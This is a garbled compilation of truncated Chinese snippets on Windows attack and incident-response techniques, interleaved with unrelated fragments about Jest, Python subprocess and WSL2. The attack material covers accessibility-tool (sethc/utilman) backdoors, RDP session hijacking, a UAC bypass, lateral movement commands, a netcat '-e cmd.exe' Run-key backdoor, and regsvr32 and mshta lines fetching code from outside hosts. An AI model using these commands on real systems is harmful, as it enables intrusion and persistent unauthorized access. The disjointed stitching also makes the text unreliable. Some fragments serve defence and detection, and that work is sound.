执行时都会卡一段时间,然后直接就结束掉了,360和火绒默认不会拦这些,也不知道是啥防护拦的。...\Windows\System32\ping ******.dnslog.cn' 通过使用ping dnslog和将命令执行结果写入文件等方式发现命令都没有执行成功,也尝试了sqlps、msbuild...等白名单获取MSF会话,也都失败了,命令中有无空格结果都一样,不知道什么鬼。...C:\ProgramData\msf.exe C:\Windows\System32\ping ******.dnslog.cn C:\Windows\System32\whoami > C:\ProgramData...0x04 注意事项 如果提权过程中需要迁移进程,但是没有可用的迁移进程,这时可以尝试用execute -Hc -f命令去执行vbc.exe和SQLPS.exe等程序得到一个可迁移进程。
运行处的内容为: C:\WINDOWS\system32\cmd.exe/c mshtahttp://w.beahh.com/page.html?...运行处的内容为: C:\WINDOWS\system32\cmd.exe /cC:\WINDOWS\system32\drivers\svchost.exe 查看另一计划任务: ?...运行处的内容为: C:\WINDOWS\system32\cmd.exe/c C:\WINDOWS\system32\wmiex.exe 根据介绍该木马病毒的技术文章,Wmiex.exe为异常应用程序。...说明肯定存在还未关闭的服务,上一步在计划任务中发现异常程序wmiex.exe,C:\WINDOWS\system32\drivers\svchost.exe查看是否有与该程序相关的服务,查看服务,果然有...MicrosoftWindows 服务的作用是让用户创建在Windows会话中可长时间运行的可执行应用程序,所以如果不关服务,删除计划任务,结束进程后,服务又会重新创建计划任务并启动程序。
异步处理和超时处理 前端代码异步逻辑太常见了,比如文件操作、请求、定时器等。Jest支持callback和Promise两种场景的异步测试。...我们先来看个超时的例子,将超时时间设置为1秒,但休眠2秒钟,最终休眠还未结束,Jest就中断了测试,并提示超时异常: function sleep(time) { return new Promise...另外,要注意系统路径的差异,可能会造成Mac上编写的测试在Windows上却运行失败: // window的路径,在Mac上会报错expect(value).toMatchInlineSnapshot(...node_modules/jest/bin/jest.js --runInBand" }} --runInBand参数让Jest在同一个进程下运行测试,方便我们断点调试。...当然如果用Webstorm调试Jest就无需担心这种并发的情况,WebStorm默认走单进程执行Jest。
方法如下: SCShell.exe 10.10.10.19 XblAuthManager "C:\Windows\System32\cmd.exe /c calc" hack-my.com Administrator...\Windows\System32\cmd.exe /c C:\Windows\System32\regsvr.32.exe /s /n /u /i:http://192.168.2.143:8080/...\Windows\system32> C:\Windows\system32>sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest: rdp-tcp...ShellExecute方法启动子进程 $com.item().Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\Windows...("cmd.exe","/c calc.exe","C:\Windows\System32",$null,0) 0X06 Evil-WinRM Evil-Winrm是基于WinRM Shell的渗透框架
reg add "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command" /d "c:\\windows\\system32\\cmd.exe...\\C:\\Windows " md "\\\\?\\C:\\Windows \\System32" copy c:\\windows\\system32\\winsat.exe "\\\\?...\\C:\\Windows \\System32\\winsat.exe" (向右滑动,查看更多) 借助ProcessMonitor监控。...C:\\\\Windows\\\\System32\\\\d3d11.dll 点击ok即可获取导出函数。 重命名后将其放入白名单文件的同一目录中。...post/windows/gather/credentials/app WMIC WMIC是WMI的扩展,提供了从命令行接口和批命令脚本执行系统管理的支持,实际上就是命令行管理工具。
这里有个演示视频(墙):All Windows TS Session Hijacking (2012 R2 Demo) 劫持方法二:直接利用query和tscon命令 来看一下query命令用法 ?...也是可以的,然而我测试时失败了。...将sethc.exe替换成cmd.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution...Options\sethc.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f 将utilman.exe替换成cmd.exe.../t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f 0X04防御方案 监控系统进程活动,开启日志记录,当有新; 禁止使用sethc.exe
图-Payload执行过程 2.病毒各部分功能: 文件名 功能 c.bat 关闭端口 item.dat 远控木马主体DLL J脚本(硬编码在Payload中) 结束指定进程,删除文件,运行item.dat...cmd批处理脚本(Payload联网获取到内存中) 结束指定进程,删除文件,删除指定账户运行c.bat 、item.dat 表-各部分功能 排查思路 1.攻击者利用SQL Server 弱密码进行暴力入侵方式入侵...C:/Windows/system32系统命令目录。...\debug\lsmo.exe 路径:C:\Windows\System32\cmd.exe命令行:"C:\Windows\System32\cmd.exe" /C ping 127.0.0.1 -n...要结束的进程列表: ? C:/Windows/Web目录: ? c3.bat脚本功能如下: ? C:\Program Files\Common Files目录下: ?
c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe ?...可视化修改 在iexplorer.exe中加入键值对:debugger c:\windows\system32\cmd.exe ?..." /v "Debugger" /t REG_SZ /d "c:\windows\system32\cmd.exe" /f ?...name Userinit -value "C:\Windows\system32\userinit.exe,C:\Windows\system32\cmd.exe" 0x07 Logon Scripts...\Windows\System32\cmd.exe ?
C、如何筛选 如果想要查看账户登录事件,在右边点击筛选当前日志,在事件ID填入4624和4625,4624 登录成功 4625 登录失败 D、事件ID及常见场景 对于Windows事件日志分析,不同的...2、执行系统命令 Win+R打开运行,输入“CMD”,回车运行“ipconfig”,产生的日志过程是这个样子: 进程创建 C:\Windows\System32\cmd.exe 进程创建 C:\Windows...\System32\ipconfig.exe 进程终止 C:\Windows\System32\ipconfig.exe 3、在入侵提权过程中,常使用下面两条语句,会形成怎么样的日志呢?...id=24659 分析案例: 管理员登录时间和登录用户名 C:\Program Files (x86)\Log Parser 2.2>LogParser.exe -i:EVT "SELECT TimeGenerated...7和Windows Server 2008 R2 安全事件的说明 https://support.microsoft.com/zh-cn/help/977519/description-of-security-events-in-windows
大家一定都知道映像劫持后门,在以下注册表中的sethc.exe项添加一个Debugger字符值(REG_SZ),并且赋值为cmd.exe的执行路径为C:\windows\system32\cmd.exe...\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" 如上文所述,修改IFEO中的“debugger”键值,用来替换原有程序的执行...根据微软官方介绍,从Windows7开始,可以在Silent Process Exit选项卡中,可以启用和配置对进程静默退出的监视操作。在此选项卡中设定的配置都将保存在注册表中。...使用Process Explorer进行检测进程的变化发现键入五下Shift执行时,先执行sethc.exe程序,当sethc.exe程序静默退出时,执行cmd.exe程序,运行效果如下: 0x05 来看一看它的原理...NT\CurrentVersion\SilentProcessExit\sethc.exe" /v MonitorProcess /t REG_SZ /d "C:\windows\system32\cmd.exe
Options下sethc.exe,添加一个Debugger字符值(REG_SZ),并且赋值为cmd.exe的执行路径为C:\windows\system32\cmd.exe,如图: ?...根据微软官方介绍,从Windows7开始,可以在Silent Process Exit选项卡中,可以启用和配置对进程静默退出的监视操作。在此选项卡中设定的配置都将保存在注册表中。 ?...使用Process Explorer进行检测进程的变化发现键入五下Shift执行时,先执行sethc.exe程序,当sethc.exe程序静默退出时,执行cmd.exe程序。...以及SilentProcessExit下ReportingMode和MonitorProcess两个项值,如图: ?...0x08 脑补一下连接成功的画面~实验结束,希望大佬勿喷。 ?
在Windows系统,shell=True默认使用COMSPEC环境变量指定的shell,一般是C:\WINDOWS\system32\cmd.exe。...startupinfo:仅限于Windows,略 creationflags:仅限于Windows,略 方法 poll():检查子进程是否终止。...communicate(input=None, timeout=None):进程交互:发送数据到stdin,读取stdout或stderr的数据知道读取到结束符。...如果子进程在timeout后没有终止,抛出TimeoutExpired异常,但子进程并未kill掉,一个良好的应用应该kill掉子进程并结束交互: proc = subprocess.Popen(......如果设置了shell=True,pid表示派生shell的进程号 returncode:子进程返回码,None表示进程未终止。负数-N表示进程被信号N终止(仅限POSIX)。
Win10下目前基于WSL2来安装NCL和Python计算绘图是比较稳妥的方案,优于其他类型虚拟机、CYGWIN、双系统等等,但是难免会遇到各种问题,本文可供参考!...安装失败并出现错误 0x80070003 适用于 Linux 的 Windows 子系统只能在系统驱动器(通常是 C: 驱动器)中运行。...在 64 位 Windows 上运行 32 位进程(若在 ARM64 上,则为任何非本机组合)时,托管的非本机进程实际上会看到一个不同的 System32 文件夹。...(32 位进程在 x64 Windows 上看到的文件夹存储在 \Windows\SysWOW64 处的磁盘上。)...你可通过查看虚拟文件夹 \Windows\sysnative,访问来自托管进程的“本机”system32 文件夹。 请记住,它实际上不会存在于磁盘上,不过文件系统路径解析程序会找到它。
Win10下目前基于WSL2来安装NCL和Python计算绘图是比较稳妥的方案,优于其他类型虚拟机、CYGWIN、双系统等等,但是难免会遇到各种问题,本文可供参考!...安装失败并出现错误 0x80070003 适用于 Linux 的 Windows 子系统只能在系统驱动器(通常是 C: 驱动器)中运行。...WSL2 要求 CPU 支持二级地址转换 (SLAT) 功能,后者已在 Intel Nehalem 处理器(Intel Core 第一代)和 AMD Opteron 中引入。...在 64 位 Windows 上运行 32 位进程(若在 ARM64 上,则为任何非本机组合)时,托管的非本机进程实际上会看到一个不同的 System32 文件夹。...你可通过查看虚拟文件夹 \Windows\sysnative,访问来自托管进程的“本机”system32 文件夹。 请记住,它实际上不会存在于磁盘上,不过文件系统路径解析程序会找到它。
ID查看计算机的开机、关机、重启的时间以及原因和注释。...2、执行系统命令 Win+R打开运行,输入“CMD”,回车运行“ipconfig”,产生的日志过程是这个样子: 进程创建 C:\Windows\System32\cmd.exe 进程创建 C:\Windows...\System32\ipconfig.exe 进程终止 C:\Windows\System32\ipconfig.exe 3、在入侵提权过程中,常使用下面两条语句,会形成怎么样的日志呢?...12账号GUID 13网络账户域 14数据包名 15密钥长度 16进程ID 17进程路径 18源网络地址...FROM c:.evtx where EventID=4625" 3.
这对于攻击者特别有用,因为可以通过SMB安排任务,因此启动远程服务的语法为: sc \\host.domain create ExampleService binpath= “c:\windows\system32...schtasks /create /tn ExampleTask /tr c:\windows\system32\calc.exe /sc once /st 00:00 /S host.domain /...\C$\Windows\Temp\build.xml" 由于双跳问题,尝试使用wmic调用msbuild.exe通过SMB构建XML将会失败。...此方法的问题在于它产生了两个进程:mmc.exe,因为从MMC2.0和MSBuild.exe调用了DCOM方法。 另外,这确实会临时写入磁盘。...\Windows\Temp\test.hta" ieframe.dll: 可以运行.url文件 [InternetShortcut] URL=file:///c:\windows\system32\cmd.exe
示例 WMI 查询如下所示: wmic /node:target.domain /user:domain\user /password:password 进程调用创建“C:\Windows\System32...扩展,它使用 MSBuild 执行 Powershell 命令,而无需通过非托管进程(二进制编译为机器代码)生成 Powershell。...此外,空格必须是它们自己的参数(例如,“cmd.exe”、$null、”/c” 是三个参数),这消除了使用 PsExec 和 DCOM 执行 MSBuild 的可能性。从这里开始,有几个选择。...\Windows\Temp\test.hta” ieframe.dll:可以运行.url文件 .url 文件示例: [互联网快捷方式] URL=file:///c:\windows\system32\...cmd.exe shdocvw.dll:也可以运行 .url 文件 Regsvr32 注册服务器用于注册和注销注册表的 DLL。
waitfor.exe 使用Process Explorer查看后台可疑的cmd.exe和powershell.exe进程的启动参数 (3)bitsadmin bitsadmin.exe是windows...copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe /y copy c:\windows\system32\sethc.exe...c:\windows\system32\dllcache\sethc.exe /y attrib c:\windows\system32\sethc.exe +h attrib c:\windows\system32...# 赋予system完全控制权限 exec xp_cmdshell 'copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe /y...' # 替换文件为cmd.exe 检测及查杀 检测c:\windows\system32\sethc.exe文件大小、时间 连按5次shift键 (9)RDP会话劫持 RDP劫持简单的说就是在不知道另一账户密码的情况下直接切换到该用户会话下
通过调用CreateProcess()函数启动Windows操作系统中的新进程,该函数将以下命令行作为字符串(对CreateProcess的lpComandLine参数):int CreateProcess...ProcessImpl()构建Cmdline并将其传递给CreateProcess() Windows函数,之后CreateProcess() 在cmd.exe shell环境中执行.bat和.cmd...如果要运行的文件包含.bat或.cmd扩展名,则要运行的映像将变为cmd.exe,即Windows命令提示符。...这导致’hello.bat …’成为’C:\ Windows \ system32 \cmd.exe / c“hello.bat …” ’。...如果我们依赖cmd的“-behavior来保护参数,使用引号会产生意外行为。通过将不受信任的数据作为命令行参数传递,由此约定不匹配引起的错误成为安全问题。
通过提示判断,该组件主要是在c盘temp下建立一个vbs文件,在注册表中设置,开机启动该vbs脚本。重启主机并验证是否重连,发现开启监听端口后,主机重新连接了端口,产生了session: ?...1.3 注意事项 每次使用该模块,msf会自动生成一个rc文件,执行该文件的命令,可删除目标机器中的vbs脚本,防止对目标系统造成一些后续影响,建议在渗透测试结束后执行该操作。 ? ?...nc添加进去,以及连接的端口,连接cmd.exe: reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc...-d 'C:\windows\system32\nc.exe -Ldp 17722 -e cmd.exe' ?...向目标主机上传功能组件,重启并查看目标主机的服务和进程。发现存在mstsvc的后台进程 ? 查看目标主机的31337端口是否开放: ?
领取专属 10元无门槛券
手把手带您无忧上云